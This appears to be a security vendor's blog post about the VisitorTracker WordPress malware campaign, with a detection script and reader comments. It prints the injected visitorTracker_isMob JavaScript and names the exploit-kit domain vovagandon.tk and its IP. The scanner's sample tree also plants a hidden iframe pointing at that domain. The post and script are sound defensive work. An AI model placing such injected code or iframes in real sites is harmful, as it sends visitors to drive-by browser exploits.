WordPress Malware – Active VisitorTracker Campaign

We are seeing a large number of WordPress sites compromised with the “visitorTracker_isMob” malware code. This campaign started 15 days ago, but only in the last few days has it gained traction, and it is now affecting a large number of sites.

Here is a quick snapshot of the infection rates we are seeing over the past two weeks. The most interesting trend is in the past 48 hours, where the numbers have grown significantly. These are the daily infection rates:

[Figure: daily infection rates for the VisitorTracker campaign over the past two weeks]

We initially shared our thoughts on it via our SucuriLabs Notes, but as the campaign has evolved we have been able to decipher more information while investigating its effects on more compromised sites. This post should serve as a resource for WordPress administrators (i.e., webmasters) in the WordPress community.

Technical Description

This malware campaign is interesting: its final goal is to use as many compromised websites as possible to redirect all of their visitors to a Nuclear Exploit Kit landing page. These landing pages try a wide variety of browser exploits to infect the computers of unsuspecting visitors.

If you think about it, the compromised websites are just means for the criminals to get access to as many endpoint desktops as they can. What’s the easiest way to reach out to endpoints? Websites, of course.

This malware campaign adds the following code to all JavaScript files on the site:

function visitorTracker_isMob( ){
  var ua = window.navigator.userAgent.toLowerCase();
  if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|mi..|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc .. |vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(ua.substr(0,4))) {
    return true;
  }
  return false;
} /* .. visitorTracker .. */ /*

This function interacts with a secondary backdoor inside the site to force the browser to load a malicious iframe from one of their Nuclear Exploit Kit landing pages. At the time of writing, the landing page points to vovagandon.tk (193.169.244.159), but that domain changes very often.

We named this malware campaign “VisitorTracker” because of the function name used in all injected JavaScript files: visitorTracker_isMob().

At the network level, here is what you would see when visiting a compromised site (thanks to Jerome Segura from Malwarebytes for sharing this with us):

[Figure: network capture of Coverity's compromised site loading the iframe and sending the browser to the vovagandon.tk landing page]

In this case, a large security provider (Coverity) had its site hacked; you can see the iframe being loaded and the browser being sent to the exploit kit landing page at vovagandon.tk. We have already reached out to Coverity about the issue, and they should be addressing it soon.

Protect your sites!

We detected thousands of sites compromised with this malware just today, and 95% of them are running WordPress. We have not yet determined a specific entry point, but it appears to be a campaign targeting recent vulnerabilities in plugins. Of all the sites we detected as compromised, 17% have already been blacklisted by Google and other popular blacklists.

If you are a WordPress user, make sure you keep all your plugins updated, including premium ones. I also recommend checking your site via our free Security / Malware Scanner (SiteCheck) to verify whether you are currently affected by this campaign. If you are a system administrator with shell access to your server, you can use the following grep command to search your files for the infection:

grep -r "visitorTracker_isMob" /var/www/

Note that grep only locates the string; it does not remove anything. Once the infected files are identified, we recommend removing the injection and looking for any other indicators of compromise, in particular the secondary backdoor that re-injects the code, since the JavaScript injection is likely to come back if the backdoor is left in place. If you need a professional response, our team is standing by to assist.
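The following is an added example, not code from this post: a small POSIX-sh wrapper around the grep check above that lists every file under a web root containing the indicators named in the post (the visitorTracker_isMob function name and the vovagandon.tk landing-page domain) and then summarises the hits per site, which helps when one server hosts hundreds of sites. It assumes the web root is /var/www or a cPanel-style /home/USER/public_html; the make_sample_tree function builds a constructed sample tree purely so the scan can be run offline.

```shell
#!/bin/sh
# Added example, not code from the Sucuri post: locate files carrying the
# VisitorTracker indicators quoted in the post and summarise hits per site.
# Assumptions: $1 (or the constructed sample tree) is the directory holding
# your sites, e.g. /var/www or /home/USER/public_html on cPanel.

# Indicators quoted in the post, as an ERE alternation. Extend it with any
# additional landing-page domains you see in your own logs.
INDICATORS='visitorTracker_isMob|vovagandon\.tk'

# Print every file under $1 that contains an indicator, one path per line.
# -r recurses, -l prints file names only, -E enables the alternation.
# Like the bare grep in the post, this only locates files; it removes nothing.
scan_visitortracker() {
    webroot="$1"
    grep -rlE "$INDICATORS" "$webroot" 2>/dev/null | sort
}

# Count hits per top-level directory under the web root (one directory per
# site on a typical shared host), worst-affected site first.
count_by_site() {
    webroot="$1"
    scan_visitortracker "$webroot" \
        | sed "s#^$webroot/##" \
        | cut -d/ -f1 \
        | sort | uniq -c | sort -rn
}

# Build a constructed sample web root (one clean file, two infected files)
# and print its path. Exists only so the functions above can run offline.
make_sample_tree() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/siteA/wp-includes/js" \
             "$tmp/siteA/wp-content/plugins/demo/js" \
             "$tmp/siteB"
    printf 'jQuery(function () { /* clean file */ });\n' \
        > "$tmp/siteA/wp-includes/js/clean.js"
    # Mimics the injected function header shown in the post (body shortened).
    printf 'function visitorTracker_isMob( ){\n  var ua = window.navigator.userAgent.toLowerCase();\n  return false;\n} /* .. visitorTracker .. */ /*\n' \
        > "$tmp/siteA/wp-content/plugins/demo/js/infected.js"
    # A page already carrying an iframe to the landing-page domain (constructed).
    printf '<iframe src="http://vovagandon.tk/" width="1" height="1"></iframe>\n' \
        > "$tmp/siteB/index.html"
    echo "$tmp"
}

# Stand-alone usage: scan the directory given as $1, or the sample tree.
root="${1:-$(make_sample_tree)}"
echo "Infected files under $root:"
scan_visitortracker "$root"
echo "Hits per site:"
count_by_site "$root"
```

Run it as `sh scan.sh /var/www` (or your cPanel public_html path); with no argument it scans the constructed sample tree and should report siteA/wp-content/plugins/demo/js/infected.js and siteB/index.html but not the clean file. The per-site summary tells you where to start cleaning, but cleaning itself is still manual: remove the injected block from each file and hunt for the backdoor that planted it.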

12 comments
  1. To be growing that quickly it must be targeting very popular plugins. Or there are just that many websites with vulnerable plugins – which seems odd considering that they weren’t already hacked.

  2. I am not a Linux expert, but I have access to my servers. /var/www/ is the path to the websites, correct? So if I am using something different I would want to change it?

    1. Yes, that’s just an example if /var/www/ is where your sites are located (the default on many Linux distros). If you use cPanel, the sites would be inside /home/USERDIR/public_html, so you have to search there.

  3. We found the same thing a couple of weeks ago on many websites. At the same time we also found thousands of .html files with a size of 30 MB or larger. Please check your root directory and update all your plugins regularly.

  4. Thanks a lot for the command to scan the server. Pretty quick solution for managing different servers with 500+ websites each.
    grep -r "visitorTracker_isMob" /var/www/

  5. I’ve been seeing this infection a lot on our sites lately. Any idea what plugin it’s exploiting to infect the site?

    My hunch is Gravity Forms, since all exploited sites on our end had that plugin and it wasn’t updated to the latest version. Moreover, many infected files were found in the Gravity Forms uploads directory, but I’m not sure.

  6. I don’t recall the _isMob, but I had 5 visitorTracker-infected sites last week. They also added a ‘nice’ Hacked by Isis or some aka index file. They added code to all themes’ headers & footers, wp-blog-header.php in core, and JS files for several popular & not-so-popular plugins including Jetpack. If you use Wordfence, you can save a lot of time searching for the files.

  7. I removed this two or three times using the grep command, but the infection keeps coming back. Can anyone suggest a permanent solution to this?

    1. The grep command only locates the string you’re searching for. It doesn’t remove anything.

  8. I am using cPanel for my website. How do I search for “visitorTracker_isMob” on a cPanel-hosted website (public_html)? Any help for a Windows user?

